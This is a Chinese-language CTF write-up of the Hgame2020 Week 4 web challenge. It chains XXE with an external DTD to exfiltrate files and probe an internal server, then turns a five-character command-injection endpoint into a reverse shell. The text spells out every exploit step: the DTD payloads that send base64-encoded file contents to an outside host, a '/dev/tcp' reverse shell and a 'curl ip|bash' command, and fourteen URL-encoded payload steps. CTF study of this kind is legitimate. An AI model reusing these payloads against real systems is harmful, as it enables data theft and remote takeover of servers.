Hgame2020 Week4

二月 15, 2020

Hgame2020 Week4 新人スタッフ(Akira)

Web

0x01 代打出题人服务中心

~~这道题没做完但是做了一大半还是写一下吧~~

Burp抓包，发现发送了xml，因此考虑是XXE

Burp payload

<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/xxe.dtd">
%remote;%int;%send;
]>
<msg>
  <id>1</id>
  <name>1</name>
  <level>1</level>
  <time>1</time>
</msg>

xxe.dtd

1 2	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=submit.php"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

成功读出 submit.php

~~询问Annevi得知内网还有一台服务器~~

改一下xxe.dtd

1 2	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/proc/net/arp"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

得到内网服务器地址

改一下xxe.dtd

1 2	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

改一下xxe.dtd

1 2	<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=http://172.21.0.76/?token=mytoken"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

然后？然后就没有回显了

考虑到可能是由于过大出错了，采用zlib压缩再读

改一下xxe.dtd

1 2	<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip/%file;'>">

得到以下字符串，保存到一个txt中

1VhJb9NAFL73V6QGNYsgE1VCRc1SVLVBSBy5UTRK7ElsxZs8Q0OFuSBOSNyQWC7cEKfmSA9I/JkCyb+AeJzEjpe8SSYCLGU8mXnzlu9tkzRURyOtBnU7doGyC5M0FdUxHe+wcKMWPEprJ3P3+Fhp7ZmsfuTqbqPrFVCLeJ7jYY+4jscMu99A06NZ7A8OpuxL+URcSg3CqVznSoQjgO1N5gyIvWd3qVuHSGhy0nsg3vj+6SMI08d5RCcn3AnFQNMihN+TEAajx7Ut7RqUEgbCmQMCArvMuT/nwviX5KgZJFfwzD5lPPr64+rz9dXrny+//Pr4avL+0/W3N4E248vvk3eXu5wfOgrWmopIQLwQiIiOawjHA8hAnTH3ECFVJ+qAeEJ2VOW6ri6SIFLBmLHtGSbBfcKw6tiM2IxKKxRT/4mEhtED5gUch92mSFg4A1goy822SHpN3n4Yj0Zr5RM4jHSjr5t/PgxPPS/N2Ri3Hzw8xXhLzYF2bK3rPNtKOSii846HhsMh0pllolAUAhX4KjzRLO3OxmgvKli/Y5H92n5NgUMioKtA76mHzgQ1YmugGZ68AhO6SiTmQGqq+t9WUyA1wrq9leYg+eJ0vt6lSeDOFIIh8dYEE2tpW8GfPu1SJjESBeC5Je23AIgTqDbOsmMTX9ELyoglEVJLE+rXxKSEa7tOfMvNRw+WjxIzRRL6CwssLvu2F4JZRRWQUcL3p3b7biASVZKW4+kTTrPQwRHSVbQp5+BjVEBinsINRJP0PFoc8fnUj26nrWXRrjqXNSZViCykmzpjn7a54kj4iiIRrpXmmM3ZL5+Ks5YDQjrE6RI3A3pTfdOw4+PZHLqzJTtSzmd4RCaKPs6T+K+iOA34cjaTRCxGoyQ+XxnGaWEFAyEv91aajuN5F5Qp5Mf94mO+vvQq8d1ybGvpXLZcEeoSLud3yP999FG0W1ZQrGvuLN7BH9m/AQ==

用php解码

<?php
$myfile = fopen("in.html", "w");
$txt = file_get_contents("php://filter/convert.base64-decode/zlib.inflate/resource=in.txt");
fwrite($myfile, $txt);
fclose($myfile);

~~由于分辨率下面出了点问题，实际上应该是这样的~~

<?php
error_reporting(0);

$token = @$_GET['token'];
if (!isset($token)) {
    die("请带上您的队伍token访问! /?token=");
}
$api = "http://checker/?token=".$token;
$t = file_get_contents($api);
if($t !== "ok") {
    die("队伍token错误");
}

highlight_file(__FILE__);

$sandbox = '/var/www/html/sandbox/'. md5("hgame2020" . $token);;
@mkdir($sandbox);
@chdir($sandbox);

$content = $_GET['v'];
if (isset($content)) {
    $cmd = substr($content,0,5);
    system($cmd);
}else if (isset($_GET['r'])) {
    system('rm -rf ./*');
}
/* _____ _    _ ______ _      _        _____ ______ _______   _____ _______   _
  / ____| |  | |  ____| |    | |      / ____|  ____|__   __| |_   _|__   __| | |
 | (___ | |__| | |__  | |    | |     | |  __| |__     | |      | |    | |    | |
  \___ \|  __  |  __| | |    | |     | | |_ |  __|    | |      | |    | |    | |
  ____) | |  | | |____| |____| |____ | |__| | |____   | |     _| |_   | |    |_|
 |_____/|_|  |_|______|______|______( )_____|______|  |_|    |_____|  |_|    (_)
                                    |/
*/

可以看出利用 &v= 可以执行长度小于等于5的命令，&r 可以删除目录下的所有东西

~~然后询问Annevi学长得知要反弹shell~~

网上找了个反弹shell命令

1	bash -i >& /dev/tcp/ip/port 0>&1

然后再构造命令

1	curl ip\|bash

为

>bash
>\|\\
>ip\\
>\ \\
>rl\\
>cu\\

再利用 ls -t>a 就可以形成命令了

~~然而我太菜没想到要构造 ls -t>a就凉了~~

构造命令

ls -t>a

为

>ls\\
ls>_	#由于顺序问题先将ls写入_文件中
>\ \\
>-t\\
>\>\a
ls>>_

然后再运行命令

1
2

sh _
sh a

就可以了

将以上命令按顺序写成dtd

#1 >ls\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3els%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#2 ls>_
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=ls%3e_">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#3 >\ \\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#4 >-t\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%2d%74%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#5 >\>\a
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%3e%61">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#6 ls>>_
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%6c%73%3e%3e%5f">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#7 >bash
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%62%61%73%68">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#8 >\|\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%7c%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#9 >ip\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%69%70%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#10 >\ \\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%5c%20%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#11 >rl\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%72%6c%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#12 >cu\\
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%3e%63%75%5c%5c">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#13 sh _
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%5f">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">

#14 sh a
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=http://172.21.0.76:80/?token=mytoken&v=%73%68%20%61">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://ip/%file;'>">